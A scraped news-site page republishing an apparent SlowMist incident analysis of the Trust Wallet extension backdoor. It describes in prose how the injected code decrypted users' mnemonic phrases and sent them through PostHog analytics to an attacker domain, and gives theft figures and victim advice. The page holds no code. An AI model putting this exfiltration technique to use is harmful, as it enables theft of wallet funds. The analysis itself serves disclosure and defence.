温馨提示:本站仅提供公开网络链接索引服务,不存储、不篡改任何第三方内容,所有内容版权归原作者所有
AI智能索引来源:http://www.bee.com/ur/63424.html
点击访问原文链接

Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hacking | Bee Network

进入原网站 导航首页
Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hacking | Bee Network Login ٹرینڈنگ نیوز میمی لانچ پیڈ اے آئی ایجنٹس DeSci TopChainExplorer نیوبی کے لیے 100x سکے مکھی کا کھیل ضروری ویب سائٹس اے پی پی کا ہونا ضروری ہے۔ کرپٹو مشہور شخصیات DePIN Rookies ضروری ٹریپ ڈیٹیکٹر بنیادی ٹولز اعلی درجے کی ویب سائٹس تبادلہ NFT ٹولز ہیلو، باہر جائیں ویب 3 کائنات کھیل ڈی اے پی پی شہد کی مکھیوں کا چھتا بڑھتا ہوا پلیٹ فارم AD تلاش کریں۔ انگریزی سکے ریچارج کریں۔ لاگ ان کریں ڈاؤن لوڈ کریں ویب 3 یونی کھیل ڈی اے پی پی شہد کی مکھیوں کا چھتا AD گھرتجزیہ•Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hacking Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hackingتجزیہ2 ماہ پہلے更新وائٹ 18,201 10 پس منظر

Tactics and Techniques Upon receiving the intelligence, the SlowMist security team immediately began analyzing the relevant samples. Let’s first look at a comparison of the core code of the previously released versions 2.67 and 2.68:

By diffing the two versions of the code, the following malicious code added by the hacker was discovered:

The malicious code iterates through all wallets in the plugin and sends a “get mnemonic phrase” request to each user’s wallet to obtain the user’s encrypted mnemonic phrase. Finally, it decrypts the mnemonic phrase using the password or passkeyPassword entered by the user when unlocking the wallet. If decryption is successful, the user’s mnemonic phrase is sent to the attacker’s domain `api.metrics-trustwallet[.]com`.

We also analyzed the attacker’s domain information. The attacker used the domain: metrics-trustwallet.com.

According to the inquiry, the malicious domain name was registered on 2025-12-08 at 02:28:18, and the domain name service provider is NICENIC INTERNATIONA.

The first request to api.metrics-trustwallet[.]com was recorded on December 21, 2025.

This timing coincides almost exactly with the time when the backdoor was implanted in code 12.22.

We continued to reproduce the entire attack process through code tracing and analysis:

Dynamic analysis reveals that after unlocking the wallet, attackers can be seen filling the error field with mnemonic phrase information in R1.

The source of this error data is obtained through the GET_SEED_PHRASE function call. Currently, Trust Wallet supports two unlocking methods: password and passkeyPassword. When unlocking, the attacker obtains the password or passkeyPassword, then calls GET_SEED_PHRASE to obtain the wallet’s mnemonic phrase (the private key is similar), and then puts the mnemonic phrase into the “errorMessage”.

The following is the code that uses emit to call GetSeedPhrase to retrieve mnemonic phrase data and populate it into error.

Traffic analysis using BurpSuite showed that after obtaining the mnemonic phrase, it was encapsulated in the errorMessage field of the request body and sent to the malicious server (https://api.metrics-trustwallet.com), which is consistent with the previous analysis.

The above process completes the mnemonic phrase/private key theft attack. Additionally, the attackers are likely familiar with the extended source code, as they utilize the open-source end-to-end product analytics platform PostHogJS to collect user wallet information.

Analysis of stolen assets (https://t.me/investigations/296) According to the hacker addresses disclosed by ZachXBT, our statistics show that, as of the time of writing, approximately 33 BTC (worth about 3 million USD) of assets were stolen from the Bitcoin blockchain, approximately 431 USD from the Solana blockchain, and approximately 3 million USD from various blockchains including the Ethereum mainnet and Layer 2. After the theft, the hackers transferred and exchanged some of the assets using various centralized exchanges and cross-chain bridges.

خلاصہ کریں۔ This backdoor incident stemmed from malicious source code modification of Trust Wallet’s internal codebase (analysis service logic), rather than the introduction of a tampered generic third-party package (such as a malicious npm package). The attackers directly modified the application’s own code, using the legitimate PostHog library to redirect analytics data to a malicious server. Therefore, we have reason to believe this was a professional APT attack, and the attackers may have gained control of the devices or deployment permissions of Trust Wallet’s developers before December 8th.

تجویز:

1. If you have installed the Trust Wallet extension wallet, you should disconnect from the internet immediately as a prerequisite for troubleshooting and taking any action.

2. Immediately export your private key/mnemonic phrase and uninstall the Trust Wallet extension wallet.

3. After backing up your private key/mnemonic phrase, transfer your funds to another wallet as soon as possible.

یہ مضمون انٹرنیٹ سے لیا گیا ہے: Christmas Crash: Analysis of the Trust Wallet Extended Wallet Hacking

Related: HashKey’s share price fell below its IPO price on its first day of trading; “Oriental Coinbase” is not yet established. مصنف: گولم (@web3_golem ) On December 17, HashKey Holdings (03887.HK) officially listed on the Hong Kong Stock تبادلہ. Unfortunately, the “first Hong Kong-listed cryptocurrency exchange” fell below its issue price of HK$6.68 within the first hour of trading. According to Hong Kong stock market data, HASHKEY HLDGS’ share price rose to a high of HK$7.12 during trading, before falling to a low of HK$6.12. The closing price on the first day was HK$6.67, close to the offering price. This stock price performance contrasts sharply with the investment enthusiasm shown by the market during HashKey Holdings’ IPO. On December 12, HashKey Holdings closed its IPO, selling 240.6 million shares at HK$6.68 per share, raising HK$1.67 billion (approximately US$206 million) for the Hong Kong IPO. The Hong Kong public offering was oversubscribed…

# تجزیہ# بٹ کوائن# ایتھریم# ایکسچینج© 版权声明صف 上一篇 What should the new financial infrastructure look like in the AI era? 下一篇 VC سرمایہ کاری کے انداز میں تبدیلی: عوامی بلاک چینز اور AI رفتار کھو دیتے ہیں۔ پیشن گوئی اور ادائیگی لیڈ لے. 相关文章 When issuing currency becomes an assembly line 6086cf14eb90bc67ca4fc62b 16,545 24H Hot Currencies and News | Plasma will once again open a $500 million deposit limit; the GENIUS Stablecoin Act has be 6086cf14eb90bc67ca4fc62b 29,796 4 RWA Weekly Report | RWA Asset Holders Add Over 20,000 in a Single Week; Bitwise to Launch Solana Staking ETF BSOL Today 6086cf14eb90bc67ca4fc62b 17,093 1 Weekly Funding Roundup | 7 projects secured funding, totaling $106 million (November 10-16) 6086cf14eb90bc67ca4fc62b 18,461 1 From Binance Life to Ecosystem Expansion, What Information Did CZ Reveal in His Late-Night AMA? 6086cf14eb90bc67ca4fc62b 1,124,009 4027 Bankless Founder: By 2026, Tokens Will Finally Be Treated as ‘Equity’ 6086cf14eb90bc67ca4fc62b 9,198 1 تازہ ترین مضامین Did Jane Street “Manipulate” BTC? Decoding the AP System, Understanding the Power Struggle Behind ETF Creation and Redemption Pricing 24 گھنٹے پہلے 694 Stop Comparing Bitcoin to Gold—It’s Now a High-Volatility Software Stock 24 گھنٹے پہلے 769 Matrixport Research: $25 Billion Gamma Unwinding Imminent, Liquidity Yet to Return Behind the Rebound 24 گھنٹے پہلے 703 ERC-5564: Ethereum’s Stealth Era Has Arrived, Receiving Addresses No Longer ‘Exposed’ 24 گھنٹے پہلے 560 Hong Kong Regulatory Green Light: Asseto Enables DL Holdings to Achieve Compliance for Two RWA Business Implementations 24 گھنٹے پہلے 661 مشہور ویب سائٹسTempoLighterGAIBگلائیڈرپلانکریلزبی سی پوکرووئی Bee.com دنیا کا سب سے بڑا Web3 پورٹل شراکت دار سکے کارپ بائننس CoinMarketCap سکے گیکو سکے لائیو آرمر Bee Network APP ڈاؤن لوڈ کریں اور web3 کا سفر شروع کریں۔ سفید کاغذ کردار عمومی سوالات © 2021–2026۔ جملہ حقوق محفوظ ہیں۔. رازداری کی پالیسی | سروس کی شرائط Bee Network APP ڈاؤن لوڈ کریں۔ اور ویب 3 کا سفر شروع کریں۔ دنیا کا سب سے بڑا Web3 پورٹل شراکت دار CoinCarp Binance CoinMarketCap CoinGecko Coinlive Armors سفید کاغذ کردار عمومی سوالات © 2021–2026۔ جملہ حقوق محفوظ ہیں۔. رازداری کی پالیسی | سروس کی شرائط تلاش کریں۔ تلاش کریں۔InSiteآنچینسماجیخبریں 热门推荐: ایئر ڈراپ ہنٹرز ڈیٹا تجزیہ کرپٹو مشہور شخصیات ٹریپ ڈیٹیکٹر اردو English 繁體中文 简体中文 日本語 Tiếng Việt العربية 한국어 Bahasa Indonesia हिन्दी Русский اردو

智能索引记录